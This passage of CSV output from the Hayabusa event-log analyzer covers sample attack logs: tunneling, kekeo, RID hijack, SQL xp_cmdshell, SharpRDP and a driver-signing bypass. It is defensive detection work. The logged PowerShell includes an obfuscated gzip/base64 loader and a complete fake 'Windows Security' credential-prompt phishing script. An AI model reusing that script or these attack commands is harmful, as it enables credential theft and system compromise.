+09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:34:37.129 
+09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx 2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 
747F3D96-3944-5D72-0000-001019773200,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx 2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx 2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx 2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx 2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:08.655 
+09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } 
Invoke-LoginPrompt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential 
Prompt,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx 2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx 2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx 2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 
747F3D96-2842-5E1E-0000-00100C417A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 
747F3D96-28B3-5E1E-0000-00101DF17B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 
747F3D96-2910-5E1E-0000-001053F57C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning 
Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: 
Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: 
